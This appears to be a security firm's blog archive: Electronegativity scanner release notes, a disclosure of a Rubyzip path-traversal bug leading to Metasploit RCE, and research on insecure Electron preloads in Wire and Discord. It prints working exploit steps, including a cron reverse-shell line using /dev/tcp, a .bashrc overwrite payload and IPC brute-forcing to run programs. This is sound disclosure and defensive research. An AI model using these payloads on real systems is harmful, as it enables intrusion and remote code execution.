Electronegativity 1.3.0 released!

After the first public release of Electronegativity, we had a great response from the community and the tool quickly became the baseline for every Electron app’s security review for many professionals and organizations. This pushed us forward, improving Electronegativity and expanding our research in the field. Today we are proud to release version 1.3.0 with many new improvements and security checks for your Electron applications.


We’re also excited to announce that the tool has been accepted for Black Hat USA Arsenal 2019, where it will be showcased at the Mandalay Bay in Las Vegas. We’ll be at Arsenal Station 1 on August 7, from 4:00 pm to 5:20 pm. Drop by to see live demonstrations of Electronegativity hunting real Electron applications for vulnerabilities (or just to say hi and collect Doyensec socks)!

If you’re simply interested in trying out what’s new in Electronegativity, go ahead and update or install it using NPM:

$ npm install @doyensec/electronegativity -g
# or
$ npm update @doyensec/electronegativity -g

To review your application, use the following command:

$ electronegativity -i /path/to/electron/app

What’s New

Electronegativity 1.1.1 initially shipped with 27 unique checks. Now it counts over 40 checks, featuring a new advanced check system to help improve the tool’s detection capabilities in sorting out false positive and false negative findings. Here is a brief list of what’s new in this 1.3.0 release:

  • Now every check has an importance and accuracy attribute which helps the auditor to determine the importance of each finding. Consequently, we also introduced some new command line flags to filter the results by severity (--severity) and by confidence (--confidence), useful for tailored Electronegativity integration in your application security pipelines or build systems.
  • We introduced a new class of checks called GlobalChecks which can dynamically set the severity and confidence for the findings or create new ones considering the inherit security risk posed by their interaction (e.g. cross-checking the nodeIntegration and sandbox flags value or the presence of the affinity flag used acrossed different windows).
  • Variable scoping analysis capabilities have been added to inspect the Function and Global variable content, when available.
  • A new single-check scan mode is now provided by passing the -l flag along with a list of enabled checks (e.g. -l "AuxClickJsCheck,AuxClickHtmlCheck"). Another command line flag has been introduced to show relative paths for files (-r).
  • The newly introduced Electron’s component BrowserView is now supported, which is meant to be an alternative to the WebView tag. The tool now also detects the use of the nodeIntegrationInSubFrames experimental option for enabling NodeJS support in sub-frames (e.g. an iframe inside a webview object).
  • Various bug fixes and new checks! (see below)

Updated Checks

This new release also comes with new and updated checks. As always, a knowledge-base containing information around risk and auditing strategy has been created for each class of vulnerabilities.

Affinity Check

When specified, renderers with the same affinity will run in the same renderer process. Due to reusing the renderer process, certain webPreferences options will also be shared between the web pages even when you specified different values for them. This can lead to unexpected security configuration overrides:

Affinity Property Vulnerability

In the above demo, the affinity set between the two BrowserWindow objects will cause the unwanted share of the nodeIntegration property value. Electronegativity will now issue a finding reporting the usage of this flag if present.

Read more on the dedicated AFFINITY_GLOBAL_CHECK wiki page.

AllowPopups Check

When the allowpopups attribute is present, the guest page will be allowed to open new windows. Popups are disabled by default.

Read more on the ALLOWPOPUPS_HTML_CHECK wiki page.

Missing Electron Security Patches Detection

This check detects if there are security patches available for the Electron version used by the target application. From this release we switched from manually updating a safe releases file to creating a routine which automatically fetches the latest releases from Electron’s official repository and determines if there are security patches available at each run.

Read more on the AVAILABLE_SECURITY_FIXES_GLOBAL_CHECK and ELECTRON_VERSION_JSON_CHECK wiki page.

Check for Custom Command Line Arguments

This check will compare the custom command line arguments set in the package.json scripts and configuration objects against a blacklist of dangerous arguments. The use of additional command line arguments can increase the application attack surface, disable security features or influence the overall security posture.

Read more on the CUSTOM_ARGUMENTS_JSON_CHECK wiki page.

CSP Presence Check and Review

Electronegativity now checks if a Content Security Policy (CSP) is set as an additional layer of protection against cross-site-scripting attacks and data injection attacks. If a CSP is detected, it will look for weak directives by using a new library based on the csp-evaluator.withgoogle.com online tool.

Read more on the CSP_GLOBAL_CHECK wiki page.

Dangerous JS Functions called with user-supplied data

Looks for occurrences of insertCSS, executeJavaScript, eval, Function, setTimeout, setInterval and setImmediate with user-supplied input.

Read more on the DANGEROUS_FUNCTIONS_JS_CHECK wiki page.

Check for mitigations set to limit the navigation flows

Detects if the on() handler for will-navigate and new-window events is used. This setting can be used to limit the exploitability of certain issues. Not enforcing navigation limits leaves the Electron application under full control to remote origins in case of accidental navigation.

Read more on the LIMIT_NAVIGATION_GLOBAL_CHECK and LIMIT_NAVIGATION_JS_CHECK wiki pages.

Detects if Electron’s security warnings have been disabled

The tool will check if Electron’s warnings and recommendations printed to the developer console have been force-disabled by the developer. Disabling this warning may hide the presence of misconfigurations or insecure patterns to the developers.

Read more on the SECURITY_WARNINGS_DISABLED_JS_CHECK and SECURITY_WARNINGS_DISABLED_JSON_CHECK wiki pages.

Detects if setPermissionRequestHandler is missing for untrusted origins

Not enforcing custom checks for permission requests (e.g. media) leaves the Electron application under full control of the remote origin. For instance, a Cross-Site Scripting vulnerability can be used to access the browser media system and silently record audio/video. Because of this, Electronegativity will also check if a setPermissionRequestHandler has been set.

Read more on the PERMISSION_REQUEST_HANDLER_GLOBAL_CHECK wiki page.

…and more to come! If you are a developer, we encourage you to use Electronegativity to understand how these Electron’s security pitfalls affect your application and how to avoid them. We really believe that Electron deserves a strong security community behind and that creating the right and robust tools to help this community is the first step towards improving the whole Electron’s ecosystem security stance.

As a final remark, we’d like to thank all past and present contributors to this tool: @ikkisoft, @p4p3r, @0xibram, @yarlob, @lorenzostella, and ultimately @Doyensec for sponsoring this release.

See you in Vegas!

@lorenzostella


On insecure zip handling, Rubyzip and Metasploit RCE (CVE-2019-5624)

During one of our projects we had the opportunity to audit a Ruby-on-Rails (RoR) web application handling zip files using the Rubyzip gem. Zip files have always been an interesting entry-point to triggering multiple vulnerability types, including path traversals and symlink file overwrite attacks. As the library under testing had symlink processing disabled, we focused on path traversal exploitation.

This blog post discusses our results, the “bug” discovered in the library itself and the implication of such an issue in a popular piece of software - Metasploit.


Rubyzip and old vulnerabilities

The Rubyzip gem has a long history of path traversal vulnerabilities (1, 2) through malicious filenames. Particularly interesting was the code change in PR #376 where a different handling was implemented by the developers.

# Extracts entry to file dest_path (defaults to @name).
# NB: The caller is responsible for making sure dest_path is safe, 
# if it is passed.
def extract(dest_path = nil, &block)
    if dest_path.nil? && !name_safe?
        puts "WARNING: skipped #{@name} as unsafe"
        return self
    end

[...]

Entry#name_safe is defined a few lines before as:

# Is the name a relative path, free of `..` patterns that could lead to
# path traversal attacks? This does NOT handle symlinks; if the path
# contains symlinks, this check is NOT enough to guarantee safety.
def name_safe?
    cleanpath = Pathname.new(@name).cleanpath
    return false unless cleanpath.relative?
    root = ::File::SEPARATOR
    naive_expanded_path = ::File.join(root, cleanpath.to_s)
    cleanpath.expand_path(root).to_s == naive_expanded_path
end

In the code above, if the destination path is passed to the Entry#extract function then it is not actually checked. A comment in the source code of that function highlights the user’s responsibility:

# NB: The caller is responsible for making sure dest_path is safe, if it is passed.

While the Entry#name_safe is a fair check against path traversals (and absolute paths), it is only executed when the function is called without arguments.

In order to verify the library bug we generated a ZIP PoC using the old (and still good) evilarc, and extracted the malicious file using the following code:

require 'zip'

first_arg, *the_rest = ARGV

Zip::File.open(first_arg) do |zip_file|
  zip_file.each do |entry|
    puts "Extracting #{entry.name}"
    entry.extract(entry.name)
  end
end
$ ls /tmp/file.txt
ls: cannot access '/tmp/file.txt': No such file or directory
$ zipinfo absolutepath.zip 
Archive:  absolutepath.zip
Zip file size: 289 bytes, number of entries: 2
drwxr-xr-x  2.1 unx        0 bx stor 18-Jun-13 20:13 /tmp/
-rw-r--r--  2.1 unx        5 bX defN 18-Jun-13 20:13 /tmp/file.txt
2 files, 5 bytes uncompressed, 7 bytes compressed:  -40.0%
$ ruby Rubyzip-poc.rb absolutepath.zip 
Extracting /tmp/
Extracting /tmp/file.txt
$ ls /tmp/file.txt
/tmp/file.txt

Resulting in a file being created in /tmp/file.txt, which confirms the issue.

As happened with our client, most developers might have upgraded to Rubyzip 1.2.2 thinking it was safe to use without actually verifying how the library works or its specific usage in the codebase.

It would have been vulnerable anyway ¯\_(ツ)_/¯

In the context of our web application, the user-supplied zip was decompressed through the following (pseudo) code:

def unzip(input)
    uuid = get_uuid()
    # 0. create a 'Pathname' object with the new uuid
    parent_directory = Pathname.new("#{ENV['uploads_dir']}/#{uuid}")

    Zip::File.open(input[:zip_file].to_io) do |zip_file|
        zip_file.each_with_index do |entry, index|
            # 1. check the file is not present
            next if File.file?(parent_directory + entry.name)
            # 2. extract the entry
            entry.extract(parent_directory + entry.name)
        end
    end
    Success
end

In item #0 we can see that a Pathname object is created and then used as the destination path of the decompressed entry in item #2. However, the sum operator between objects and strings does not work as many developers would expect and might result in unintended behavior.

We can easily understand its behavior in an IRB shell:

$ irb
irb(main):001:0> require 'pathname'              
=> true
irb(main):002:0> parent_directory = Pathname.new("/tmp/random_uuid/")
=> #<Pathname:/tmp/random_uuid/>
irb(main):003:0> entry_path = Pathname.new(parent_directory + File.dirname("../../path/traversal"))
=> #<Pathname:/path>
irb(main):004:0> destination_folder = Pathname.new(parent_directory + "../../path/traversal")
=> #<Pathname:/path/traversal>
irb(main):005:0> parent_directory + "../../path/traversal"
=> #<Pathname:/path/traversal>

Thanks to the interpretation of the ../ by Pathname, the argument to Rubyzip’s Entry#extract call does not contain any path traversal payloads which results in a mistakenly supposed “safe” path. Since the gem does not perform any validation, the exploitation does not even require this unexpected path concatenation.

From Arbitrary File Write to RCE (RoR Style)

Apart from the usual *nix and windows specific techniques (like writing a new cronjob or exploiting custom scripts), we were interested in understanding how we could leverage this bug to achieve RCE in the context of a RoR application.

Since our target was running in production environments, RoR classes were cached on first usage via the cache_classes directive. During the time allocated for the engagement we didn’t find a reliable way to load/inject arbitrary code at runtime via file write without requiring a RoR reboot.

However, we did verify in a local testing environment that chaining together a Denial of Service vulnerability and a full path disclosure of the web app root can be used to trigger the web server reboot and achieve RCE via the aforementioned zip handling vulnerability.

The official documentation explains that:

After it loads the framework plus any gems and plugins in your application, Rails turns to loading initializers. An initializer is any file of ruby code stored under /config/initializers in your application. You can use initializers to hold configuration settings that should be made after all of the frameworks and plugins are loaded.

Using this feature, an attacker with the right privileges can add a malicious .rb in the /config/initializers folder which will be loaded at web server (re)boot.

Attacking the attackers. Metasploit Authenticated RCE (CVE-2019-5624)

Just after the end of the engagement and with the approval of our customer, we started looking at popular software that was likely affected by the Rubyzip bug. As we were brainstorming potential targets, an icon on one of our VMs caught our attention: Metasploit Framework

Going through the source code, we were able to quickly identify several files that are using the Rubyzip library to create ZIP files. Since our vulnerability resides in the extract function, we recalled an option to import a ZIP workspace from previous MSF versions or from different instances. We identified the corresponding code path in zip.rb file (line 157) that is responsible for importing a Metasploit ZIP File:

 data.entries.each do |e|
      target = ::File.join(@import_filedata[:zip_tmp], e.name)
      data.extract(e,target)

As for the vanilla Rubyzip example, creating a ZIP file containing a path traversal payload and embedding a valid MSF workspace (an XML file containing the exported info from a scan) made it possible to obtain a reliable file-write primitive. Since the extraction is done as root, we could easily obtain remote command execution with high privileges using the following steps:

  1. Create a file with the following content:
    * * * * * root /bin/bash -c "exec /bin/bash 0</dev/tcp/172.16.13.144/4444 1>&0 2>&0 0<&196;exec 196<>/dev/tcp/172.16.13.144/4445; bash <&196 >&196 2>&196"
  2. Generate the ZIP archive with the path traversal payload:
    python evilarc.py exploit --os unix -p etc/cron.d/
  3. Add a valid MSF workspace to the ZIP file (in order to have MSF to extract it, otherwise it will refuse to process the ZIP archive)
  4. Setup two listeners, one on port 4444 and the other on port 4445 (the one on port 4445 will get the reverse shell)
  5. Login in the MSF Web Interface
  6. Create a new “Project”
  7. Select “Import”, “From file”, chose the evil ZIP file and finally click the “Import” button
  8. Wait for the import process to finish
  9. Enjoy your reverse shell


Conclusions

In case you are using Rubyzip, check the library usage and perform additional validation against the entry name and the destination path before calling Entry#extract.

Here is a small recap of the different scenarios (as of Rubyzip v1.2.2):

Usage Input by user? Vulnerable to path traversal?
entry.extract(path) yes (path) yes
entry.extract(path) partially (path is concatenated) maybe
entry.extract() partially (entry name) no
entry.extract() no no

If you’re using Metasploit, it is time to patch. We look forward to seeing a msf module for CVE-2019-5624.

Credits and References

Credit for the research and bugs go to @voidsec and @polict.

This work has been performed during a customer engagement and Doyensec 25% Research Time. As such, we would like to thank our customer and Metasploit maintainers for their support.

If you’re interested in the topic, take a look at the following resources:


Subverting Electron Apps via Insecure Preload

We’re back from BlackHat Asia 2019 where we introduced a relatively unexplored class of vulnerabilities affecting Electron-based applications.

Despite popular belief, secure-by-default settings are slowly becoming the norm and the dev community is gradually learning common pitfalls. Isolation is now widely deployed across all top Electron applications and so turning XSS into RCE isn’t child’s play anymore.

From Alert to Calc

BrowserWindow preload introduces a new and interesting attack vector. Even without a framework bug (e.g. nodeIntegration bypass), this neglected attack surface can be abused to bypass isolation and access Node.js primitives in a reliable manner.

You can download the slides of our talk from the official BlackHat Briefings archive: http://i.blackhat.com/asia-19/Thu-March-28/bh-asia-Carettoni-Preloading-Insecurity-In-Your-Electron.pdf

Preloading Insecurity In Your Electron

Preload is a mechanism to execute code before renderer scripts are loaded. This is generally employed by applications to export functions and objects to the page’s window object as shown in the official documentation:

let win
app.on('ready', () => {
  win = new BrowserWindow({
    webPreferences: {
      sandbox: true,
      preload: 'preload.js'
    }
  })
  win.loadURL('http://google.com')
})

preload.js can contain custom logic to augment the renderer with easy-to-use functions or application-specific objects:

const fs = require('fs')
const { ipcRenderer } = require('electron')

// read a configuration file using the `fs` module
const buf = fs.readFileSync('allowed-popup-urls.json')
const allowedUrls = JSON.parse(buf.toString('utf8'))

const defaultWindowOpen = window.open

function customWindowOpen (url, ...args) {
  if (allowedUrls.indexOf(url) === -1) {
    ipcRenderer.sendSync('blocked-popup-notification', location.origin, url)
    return null
  }
  return defaultWindowOpen(url, ...args)
}

window.open = customWindowOpen

[...]

Through performing numerous assessments on behalf of our clients, we noticed a general lack of awareness around the risks introduced by preload scripts. Even in popular applications using all recommended security best practices, we were able to turn boring XSS into RCE in a matter of hours.

This prompted us to further research the topic and categorize four types of insecure preloads:

  • (1) Preload scripts can reintroduce Node global symbols back to the global scope

    While it is evident that reintroducing some Node global symbols (e.g. process) to the renderer is dangerous, the risk is not immediately obvious for classes like Buffer (which can be leveraged for a nodeIntegration bypass)

  • (2) Preload scripts can introduce functionalities that can be abused by untrusted code

    Preload scripts have access to Node.js, and the functions exported by applications to the global window often include dangerous primitives

  • (3) Preload scripts can facilitate sandbox bypasses

    Even with sandbox enabled, preload scripts still have access to Node.JS native classes and a few Electron modules. Once again, preload code can leak privileged APIs to untrusted code that could facilitate sandbox bypasses

  • (4) Without contextIsolation, the integrity of preload scripts is not guaranteed

    When isolated words are not in use, prototype pollution attacks can override preload script code. Malicious JavaScript running in the renderer can alter preload functions in order to return different data, bypass checks, etc.

In this blog post, we will analyze a couple of vulnerabilities belonging to group (2) which we discovered in two popular applications: Wire App and Discord.

For more vulnerabilities and examples, please refer to our presentation.

WireApp Desktop Arbitrary File Write via Insecure Preload

Wire App is a self-proclaimed “most secure collaboration platform”. It’s a secure messaging app using end-to-end encryption for file sharing, voice, and video calls. The application implements isolation by using a BrowserWindow with nodeIntegration disabled, in which a webview HTML tag is used.

Wire App frames

Despite enforcing isolation, the web-view-preload.js preload file contains the following code:

const webViewLogger = new winston.Logger();
    webViewLogger.add(winston.transports.File, {
      filename: logFilePath,
      handleExceptions: true,
    });

    webViewLogger.info(config.NAME, 'Version', config.VERSION);

    // webapp uses global winston reference to define log level
    global.winston = webViewLogger;

Code running in the isolated renderer (e.g. XSS) can override the logger’s transport setting in order to obtain a file write primitive.

This issue can be easily verified by switching to the messages view:

window.document.getElementsByTagName("webview")[0].openDevTools();

Before executing the following code:

function formatme(args) {
  var logMessage = args.message;
  return logMessage;
}

winston.transports.file = (new winston.transports.file.__proto__.constructor({
        dirname: '/home/ikki/',
        level: 'error',
        filename: '.bashrc',
        json: false,
        formatter: formatme
}))

winston.error('xcalc &');


This issue affected all supported platforms (Windows, Mac, Linux). As the sandbox entitlement is enabled on macOS, an attacker would need to chain this issue with another bug to write outside the application folders. Please note that since it is possible to override some application files, RCE may still be possible without a macOS sandbox bypass.

A security patch was released on March 14, 2019, just few days after our disclosure.

Discord Desktop Arbitrary IPC via Insecure Preload

Discord is a popular voice and text chat used by over 250 million gamers. The application implements isolation by simply using a BrowserWindow with nodeIntegration disabled. Despite that, the preload script (app/mainScreenPreload.js) in use by the same BrowserWindow contains multiple exports including the following:

var DiscordNative = {
    isRenderer: process.type === 'renderer',
    //..
    ipc: require('./discord_native/ipc'),
};

//..

process.once('loaded', function () {
    global.DiscordNative = DiscordNative;
    //..
}

where app/discord_native/ipc.js contains the following code:

var electron = require('electron');
var ipcRenderer = electron.ipcRenderer;

function send(event) {
  for (var _len = arguments.length, args = Array(_len > 1 ? _len - 1 : 0), _key = 1; _key < _len; _key++) {
    args[_key - 1] = arguments[_key];
  }

  ipcRenderer.send.apply(ipcRenderer, [event].concat(args));
}

function on(event, callback) {
  ipcRenderer.on(event, callback);
}

module.exports = {
  send: send,
  on: on
};

Without going into details, this script is basically a wrapper for the official Electron’s asynchronous IPC mechanism in order to exchange messages from the render process (web page) to the main process.

In Electron, ipcMain and ipcRenderer modules are used to implement IPC between the main process and the renderers but they’re also leveraged for internal native framework invocations. For instance, the window.close() function is implemented using the following event listener:

// Implements window.close()
ipcMainInternal.on('ELECTRON_BROWSER_WINDOW_CLOSE', function (event) {
  const window = event.sender.getOwnerBrowserWindow()
  if (window) {
    window.close()
  }
  event.returnValue = null
})

As there’s no separation between application-level IPC messages and the ELECTRON_ internal channel, the ability to set arbitrary channel names allows untrusted code in the renderer to subvert the framework’s security mechanism.

For example, the following synchronous IPC calls can be used to execute an arbitrary binary:

(function () {
    var ipcRenderer = require('electron').ipcRenderer
    var electron = ipcRenderer.sendSync("ELECTRON_BROWSER_REQUIRE","electron");
    var shell = ipcRenderer.sendSync("ELECTRON_BROWSER_MEMBER_GET", electron.id, "shell");
    return ipcRenderer.sendSync("ELECTRON_BROWSER_MEMBER_CALL", shell.id, "openExternal", [{
                            type: 'value',
                            value: "file:///Applications/Calculator.app"
    }]);
})();

In the case of the Discord’s preload, an attacker can issue asynchronous IPC messages with arbitrary channels. While it is not possible to obtain a reference of the objects from the function exposed in the untrusted window, an attacker can still brute-force the reference of the child_process using the following code:

DiscordNative.ipc.send("ELECTRON_BROWSER_REQUIRE","child_process");

for(var i=0;i<50;i++){
    DiscordNative.ipc.send("ELECTRON_BROWSER_MEMBER_CALL", i, "exec", [{
            type: 'value',
            value: "calc.exe"
    }]);
}


This issue affected all supported platforms (Windows, Mac, Linux). A security patch was released at the beginning of 2019. Additionally, Discord also removed backwards compatibility code with old clients.


Electronegativity is finally out!

We’re excited to announce the public release of Electronegativity, an opensource tool capable of identifying misconfigurations and security anti-patterns in Electron-based applications.

Electronegativity is the first-of-its-kind tool that can help software developers and security auditors to detect and mitigate potential weaknesses in Electron applications.

If you’re simply interested in trying out Electronegativity, go ahead and install it using NPM:

$ npm install @doyensec/electronegativity -g

To review your application, use the following command:

$ electronegativity -i /path/to/electron/app

Results are displayed in a compact table, with references to application files and our knowledge-base.

Electronegativity Demo

The remaining blog post will provide more details on the public release and introduce its current features.

A bit of history

Back in July 2017 at the BlackHat USA Briefings, we presented the first comprehensive study on Electron security where we primarily focused on framework-level vulnerabilities and misconfigurations. As part of our research journey, we also created a checklist of security anti-patterns and must-have features to illustrate misconfigurations and vulnerabilities in Electron-based applications.

With that, me and Claudio Merloni started developing the first prototype for Electronegativity. Immediately after the BlackHat presentation, we received a lot of great feedback and new ideas on how to evolve the tool. Back home, we started working on those improvements until we realized that we had to rethink the overall design. The code repository was made private again and minor refinements were done in between customer projects only.

In the summer of 2018, we hired Doyensec’s first intern - Ibram Marzouk who started working on the tool again. Later, Jaroslav Lobacevski joined the project team and pushed Electronegativity to the finish line. Claudio, Ibram and Jaroslav, thanks for your contributions!

While certainly overdue, we’re happy that we eventually managed to release the tool in better shape. We believe that Electron is here to stay and hopefully Electronegativity will become a useful companion for all Electron developers out there.

How Does It Work?

Electronegativity leverages AST / DOM parsing to look for security-relevant configurations. Checks are standalone files, which makes the tool modular and extensible.

Building a new check is relatively easy too. We support three “families” of checks, so that the tool can analyze all resources within an Electron application:

When you scan an application, the tool will unpack all resources (if applicable) and perform an audit using all registered checks. Results are displayed in the terminal, CSV file or SARIF format.

Supported Checks

Electronegativity currently implements the following checks. A knowledge-base containing information around risk and auditing strategy has been created for each class of vulnerabilities:

  1. ALLOWPOPUPS_HTML_CHECK
  2. AUXCLICK_JS_CHECK
  3. AUXCLICK_HTML_CHECK
  4. BLINK_FEATURES_JS_CHECK
  5. BLINK_FEATURES_HTML_CHECK
  6. CERTIFICATE_ERROR_EVENT_JS_CHECK
  7. CERTIFICATE_VERIFY_PROC_JS_CHECK
  8. CONTEXT_ISOLATION_JS_CHECK
  9. CUSTOM_ARGUMENTS_JS_CHECK
  10. DANGEROUS_FUNCTIONS_JS_CHECK
  11. ELECTRON_VERSION_JSON_CHECK
  12. EXPERIMENTAL_FEATURES_HTML_CHECK
  13. EXPERIMENTAL_FEATURES_JS_CHECK
  14. HTTP_RESOURCES_JS_CHECK
  15. HTTP_RESOURCES_HTML_CHECK
  16. INSECURE_CONTENT_HTML_CHECK
  17. INSECURE_CONTENT_JS_CHECK
  18. NODE_INTEGRATION_HTML_CHECK
  19. NODE_INTEGRATION_EVENT_JS_CHECK
  20. NODE_INTEGRATION_JS_CHECK
  21. OPEN_EXTERNAL_JS_CHECK
  22. PERMISSION_REQUEST_HANDLER_JS_CHECK
  23. PRELOAD_JS_CHECK
  24. PROTOCOL_HANDLER_JS_CHECK
  25. SANDBOX_JS_CHECK
  26. WEB_SECURITY_HTML_CHECK
  27. WEB_SECURITY_JS_CHECK

Leveraging these 27 checks, Electronegativity is already capable of identifying many vulnerabilities in real-life applications. Going forward, we will keep improving the detection and updating the tool to keep pace with the fast-changing Electron framework. Start using Electronegativity today!